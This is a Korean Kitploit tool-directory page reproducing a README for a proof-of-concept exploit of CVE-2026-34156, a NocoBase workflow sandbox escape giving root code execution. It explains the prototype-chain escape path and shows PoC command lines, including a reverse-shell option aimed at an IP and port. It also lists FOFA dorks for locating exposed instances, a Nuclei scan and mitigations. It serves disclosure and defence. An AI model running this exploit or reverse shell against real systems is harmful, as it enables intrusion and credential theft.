Skip to content
KitploitKITPLOIT
도구블로그
제출
도구블로그
제출

해킹, 침투 테스트 및 사이버 보안 도구를 당신의 보안 무기고에!

Kitploit은 해킹, 사이버 보안 및 침투 테스트 도구 디렉토리입니다. 최신 프로젝트 업데이트를 발견하여 취약점을 찾고, 시스템을 분석하고, 테스트를 자동화하고, 보안을 강화하세요.

··피드·문의·개인정보·© 2026 Kitploit

도구 디렉토리

카테고리

모든 카테고리 보기
Loading categories
CVE-2026-34156 — CVE-2026-34156 | Kitploit
도구/GitHubGitHub/0xblackash/cve-2026-34156
Vulnerability AnalysisCode AnalysisExploitationWeb Application ExploitationCTFPenetration TestingLearning & Education
GitHub0xblackash/cve-2026-34156

CVE-2026-34156

CVE-2026-34156

저장소 보기
4개월 전아직 검토되지 않음

인기

모두 보기 →

커뮤니티에서 가장 많이 사용되는 도구를 찾아보세요.

모든 도구 탐색

도구 컬렉션을 둘러보세요

모든 도구 보기 →
공유

🚨 CVE-2026-34156 - NocoBase 치명적 샌드박스 탈출

ChatGPT Image Apr 3, 2026, 01_32_16 PM Critical CVSS 9.9 Exploit Public

NocoBase에서 인증되지 않은 사용자 / 낮은 권한 → 루트 원격 코드 실행


📌 개요

CVE-2026-34156은 NocoBase(오픈소스 노코드/로우코드 플랫폼)의 치명적인 샌드박스 탈출 취약점입니다.

워크플로 스크립트 노드(Workflow Script Node) 를 생성하거나 실행할 수 있는 공격자는 낮은 권한만으로도 Node.js vm 샌드박스를 탈출하여 컨테이너 내부에서 루트 권한으로 완전한 원격 코드 실행을 달성할 수 있습니다.

영향을 받는 버전

  • NocoBase < 2.0.28

수정된 버전

  • NocoBase 2.0.28 (2026년 3월 릴리스)

🛠 취약점 세부 정보

  • 구성 요소: @nocobase/plugin-workflow-javascript (스크립트 노드)
  • 유형: console._stdout.constructor.constructor를 통한 샌드박스 탈출
  • 영향:
    • 루트(uid=0) 권한으로 원격 코드 실행
    • 임의 명령 실행
    • 파일 시스템 접근(fs)
    • 환경 변수 유출(데이터베이스 자격 증명, 비밀 값)
    • 컨테이너 전체 장악

근본 원인

샌드박스로 전달되는 console 개체는 호스트 영역(host realm) 의 것이므로, 공격자는 프로토타입 체인을 타고 올라가 실제 Function 생성자 → process.mainModule.require에 접근할 수 있습니다.


🚀 익스플로잇

개념 증명(PoC)

root@kitploit:~
# Simple command execution
python3 CVE-2026-34156.py -u https://target.com -e [email protected] -p password -c "id"

# Reverse shell
python3 CVE-2026-34156.py -u https://target.com -r 192.168.1.100:4444

리포지토리 포함 항목: 전체 PoC 스크립트, Nuclei 템플릿, 안전 점검 도구.


🧪 탐지

Nuclei 템플릿

root@kitploit:~
nuclei -u https://target -t cves/CVE-2026-34156.yaml

FOFA Dorks

root@kitploit:~
title="NocoBase" || title="Sign in - NocoBase"
title="NocoBase" && body="workflow"

🛡️ 완화 조치

  1. 즉시 NocoBase 2.0.28 이상으로 업그레이드하세요.
  2. 신뢰할 수 없는 사용자에게는 워크플로 스크립트 노드를 비활성화하세요.
  3. NocoBase 컨테이너를 비루트(non-root) 사용자로 실행하세요.
  4. 프로덕션 환경에서는 더 강력한 샌드박싱(예: isolated-vm)을 사용하세요.

📸 스크린샷

cve-2026-34156

⚠️ 법적 고지

이 리포지토리는 교육 및 승인된 보안 연구 목적으로만 제공됩니다. 소유한 시스템 또는 명시적인 서면 테스트 허가를 받은 시스템에서만 사용하세요.

승인되지 않은 익스플로잇은 불법입니다.


⭐ 크레딧 및 참고 자료

  • 발견자: 알 수 없음(공개적으로 공개됨)
  • 패치: NocoBase 보안 팀
  • NVD: CVE-2026-34156
  • GitHub 보안 권고: GHSA-px3p-vgh9-m57c

보안 커뮤니티를 위해 ❤️로 제작됨
안전을 유지하세요. 신속하게 패치하세요.

도구 다운로드